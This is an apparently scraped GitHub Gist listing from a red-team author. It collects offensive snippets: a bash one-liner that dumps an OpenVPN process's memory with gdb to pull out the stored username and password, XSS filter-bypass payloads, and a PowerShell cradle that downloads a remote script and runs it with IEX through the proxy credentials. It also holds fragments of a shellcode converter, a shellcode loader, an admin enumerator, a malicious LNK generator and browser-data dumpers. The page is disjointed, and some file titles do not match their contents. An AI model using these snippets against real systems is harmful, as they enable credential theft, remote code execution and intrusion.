Steve Borosh rvrsh3ll

View Invoke-WMISMB.ps1
function Invoke-SMBWmi {
$ComputerName = ".",
$Pipename = "tf12lol"
# This little hack-job will grab credentials from a running openvpn process in Linux
# Keep in mind this won't work if the user used the --auth-nocache flag
pid=$(ps -efww | grep -v grep | grep openvpn | awk '{print $2}')
echo $pid | grep rw-p /proc/$pid/maps | sed -n 's/^\([0-9a-f]*\)-\([0-9a-f]*\) .*$/\1 \2/p' | while read start stop; do gdb --batch-silent --silent --pid $pid -ex "dump memory $pid-$start-$stop.dump 0x$start 0x$stop"; done
echo "Your credentials should be listed below as username/password"
strings *.dump | awk 'NR>=3 && NR<=4 { print }'
rm *.dump --force
rvrsh3ll / xxsfilterbypass.lst
Last active Oct 6, 2022
XSS Filter Bypass List
View xxsfilterbypass.lst
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
View proxybypass.txt
powershell.exe -nop -c "`$wc = New-Object System.Net.Webclient; `$wc.Headers.Add('User-Agent','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) Like Gecko'); `$wc.proxy= [System.Net.WebRequest]::DefaultWebProxy; `$wc.proxy.credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials; IEX (`$wc.downloadstring('$URL'))"
View Get-RecentDocs.ps1
function Get-RecentDocs {
Pulls names of recently opened documents from registry
Author: Matthew Graeber (@mattifestation)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
View Get-BrowserInformation.ps1
function Get-BrowserInformation {
Dumps Browser Information
Author: @424f424f
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
Enumerates browser history or bookmarks
import binascii
import sys
file_name = sys.argv[1]
with open (file_name) as f:
hexdata = binascii.hexlify(
hexlist = map(''.join, zip(hexdata[::2], hexdata[1::2]))
shellcode = ''
for i in hexlist:
shellcode += "0x{},".format(i)
View Invoke-WMItoSMB.ps1
function Invoke-SMBShellcodeLoad {
Short description
Long description
An example
rvrsh3ll /
Created Sep 3, 2017 — forked from ropnop/
Python script using Impacket to enumerate local administrators over SAMR
#!/usr/bin/env python
# Title:
# Author: @ropnop
# Description: Python script using Impacket to query members of the builtin Administrators group through SAMR
# Similar in function to Get-NetLocalGroup from Powerview
# Won't work against Windows 10 Anniversary Edition unless you already have local admin
# See:
# Heavily based on original Impacket example scripts written by @agsolino and available here:
View Create-LNK.ps1
function Create-LNKPayload{
Generates a malicious LNK file
Name of the LNK file you want to create.